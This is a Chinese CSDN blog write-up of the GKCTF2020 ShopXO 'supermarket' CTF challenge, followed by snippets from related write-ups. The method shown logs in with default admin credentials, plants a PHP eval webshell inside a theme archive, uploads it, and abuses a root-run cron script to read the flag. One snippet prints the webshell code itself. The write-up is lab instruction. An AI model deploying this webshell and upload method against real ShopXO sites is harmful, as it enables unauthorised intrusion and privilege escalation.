[GKCTF2020]老八小超市儿 -wp

最新推荐文章于 2021-06-24 01:18:41 发布
最新推荐文章于 2021-06-24 01:18:41 发布
阅读量1.3k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/106602587
这篇博客介绍了GKCTF2020挑战中利用shopxo系统漏洞获取flag的过程。通过默认后台admin.php登录,下载默认主题并在其中插入一句话木马,再上传至服务器。通过分析头像图片路径找到木马位置,使用蚁剑连接并发现flag和flag.hint文件。利用auto.sh脚本每60秒运行一次的特性,修改脚本读取flag并显示在flag.hint中。

这道题本就是基于shopxo已有的漏洞,解题思路也就基于此漏洞,若一开始对此漏洞无了解,那就比较难顶了

在这里插入图片描述
打开题目,就是一购物主页。
如果有了解shopxo,就知道默认后台就是admin.php,
登入的默认账号密码是admin和shopxo。
在这里插入图片描述然后就进入到了网站后台
在这里插入图片描述接下来就在应用中心里的应用商店找到主题,然后下载默认主题
在这里插入图片描述因为后面应用主题的时候需要我们重新把下载的这个压缩包传上去,那我们就可以把一句话写入压缩包,给他一起传上去。

我们可以在_static_里面加上一个test.php,这里面就是我们加入的一句话了,加个phpinfo()可以方便确认马到底有没有穿上去。

(题目是简单化了这个漏洞的,正常情况下不会有人把网站资源什么的给用户下载,然后再让用户上传的,还加上什么都可以传)

在这里插入图片描述

最低0.47元/天 解锁文章
【漏洞复现】ShopXO任意文件读取漏洞
晚风不及你
03-04 2571
ShopXO是一套开源的企业级开源电子商务系统,包含PC、H5、微信小程序、支付宝小程序、百度小程序等多个终端,遵循Apache2开源协议发布,基于ThinkPHP5.1框架研发。该系统具有求实进取、创新专注、自主研发、国内领先企业级B2C电商系统解决方案等特点,可满足99%的电商运营需求。
GKCTF2020-后四道WEB复现-wp
A_dmin的博客
05-27 1363
GKCTF2020-后四道WEB复现-wp [GKCTF2020]EZ三剑客-EzWeb [GKCTF2020]EZ三剑客-EzNode [GKCTF2020]EZ三剑客-EzTypecho [GKCTF2020]Node-Exe
[GKCTF2020]超市
missht0的博客
01-31 238
[GKCTF2020]超市儿 进去之后是一个由ShopXO CMS搭建的网站 默认后台地址以及账号密码:/admin.php | admin:shopxo 进入后台,主题传马 传到_static_目录下 这一步一开始我用的是1.7的不行,1.8才可以 蚁剑连接 flag里面是假的 flag.hint,让我们获得root权限 auto.sh,每60s执行一次这个py程序,名字还是makeflaghint,猜测它有root权限 在程序中添加两行代码 flag=io.open("/roo
【学习笔记 21】 buu [GKCTF2020]超市
weixin_43553654的博客
06-24 635
0x00 知识点 web安全渗透,后渗透提权 ps:想要看我之前的文章请点击如下链接 点我点我 00x1 解题思路 一看题目就是一道有味道的ctf题,打开一看发现是个(粉粉嫩的)网站shopxocms的网站,百度搜索对应的网站漏洞,说是后台有地方可以利用压缩包getshell,尝试一下发现是admin.php就能打开对应的后台登录界面,并且知道了初始登录用户名admin,密码shopox,直接登录后台 登陆进去后在应用中心->应用商店->主题的第一个默认主题,下载下来 用其中任意一个压缩包,用
all-in-one-wp-migration-file-extension.zip
04-07
《全面解析WordPress迁移插件:All-in-One WP Migration File Extension》 在WordPress的世界里,数据迁移是一项常见的任务,无论是为了网站备份、迁移至新的主机,还是进行开发测试,都需要高效且可靠的工具。All-...
all-in-one-wp-migration:多合一WP迁移-无限制importexport
04-09
《全面解析多合一WP迁移插件:实现无限导入与导出》 在WordPress的世界中,数据迁移是一项常见的任务,无论是为了备份、站点迁移还是多站点管理。"All In One WP Migration" 插件正是为此而生,它为用户提供了一种...
buu [GKCTF2020]EzMachine wp
苗_的博客
09-10 1071
今天终于沉下心看了一道vm逆向题了...wp我尽量写的详细一点qaq Part1 先拖进ida看一下,发现找不到什么关键函数,搜索字符串也搜不出什么。静态不大行我们就动调试试。 第一种 调试发现程序跳转到0x9B1595,和0x009B1594这一步对比发现0x009B1594会跑飞,所以初步判定它是混淆指令,到ida里把它nop掉。 其实nop掉的目的就是把0x9B1595这里创建函数然后反汇编,这样会更好分析一点。 直接nop肯定是不行的,会破坏掉0x9B1595这里的代码,要先ida动
houyusen#poc#ShopXO v1.8.0 后台getshell1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
超市
qq_53755216的博客
06-24 266
超市儿 复习期末考试中 忍住自己打ctf的强烈欲望 正好快要21的GKCTF (挂科ctf) 把20年的拿来做一下 嘿嘿 正文! 首先确实拿到了一个小超市 但是不知道洞在哪.。。由于buu的特性 (你懂的 只能手撸了 刚开始有点迷茫 先看看搜索处是否有sql注入 观察一下路由 index.php?s=/index/goods/index/id/8.html ...
2020/7/21 - [GKCTF2020]超市 - 弱密码、木马上传、间接非正常提权
抒情诗
07-21 389
这是个简单的实体环境了,这个弱密码起到了很大的作用 文章目录1.弱密码2.下载主题3.上传木马4.连接木马 1.弱密码 shopxo管理员好像有两个,一个是admin(超级管理员),另一个是shopxo(一般管理员),他们的密码都是shopxo,一句话,弱密码真恶心。 2.下载主题 下载第一个默认主题,不要钱的直接下。 3.上传木马 搞个一句话 安装主题,当主题转为1.8.1就安装成功了,我们的一句话也就上传成功了。 4.连接木马 由此推测我们的一句话上传到的位置为 http://d6f0faff-
Writeup-GKCTF-Web题:超市
Y5neKO's blog
05-28 264
奥里给,干了兄弟们!原题地址:https://buuoj.cn/challenges#[GKCTF2020]超市儿首先开启题目环境,进去是一个完整搭建的网站,在页面上查找有用信息,很快可以判断出是由ShopXO CMS搭建的无奈本人才疏学浅(疏?浅?无!),只好请出度娘师,通过度娘师知道了默认后台地址以及账号密码:/admin.php | admin:sho...
GKCTF2020_web
ChenZIDu的博客
05-25 837
不完整,先把打出来的题目写一下,再写复现的好了 CheckIN 源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->cod
GKCTF web-超市儿 解题思路writeup
qq_41743240的博客
05-24 1243
打开题目 一看就知道是个CMS,我们试着搜索一下ShopXO企业级免费开源商城系统的漏洞,可以知道一个后台的文件上传漏洞 利用方法链接 http://www.nctry.com/1660.html 之后查看flag,会发现是假的,但从中可以知道真实flag在root目录下,访问root目录没有权限 查看根目录的flag.hint可以知道一个线索: Sun May 24 07:51:26 2020 Get The RooT,The Date Is Useful! 然后查看根目录的auto.sh可
GKCTF2020web
conelly的博客
03-26 418
[GKCTF2020]cve版签到 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。如果URL包含零(\ 0)字符,则 URL将被静默地截断。 这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 先访问本地主机,用%00截断 /?url=http://127.0.0.1%00www.ctfhub.com 提示要以123结尾 /?url=h
BUUCTF刷题记录 超市
m0_46576074的博客
05-28 528
[GKCTF2020]超市儿 进入网址 admin.php进入后台 账号admin 密码shopxo 应用中心——应用商城——主题 下载默认主题 编写一个a.php文件放进默认主题 a.php文件内容 <?php @eval($_POST[a]); phpinfo(); ?> 测试成功性 http://771c3e8f-4cea-4775-be69-fce5b8bd52f2.node3.buuoj.cn/public/static/index/default/a.ph
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值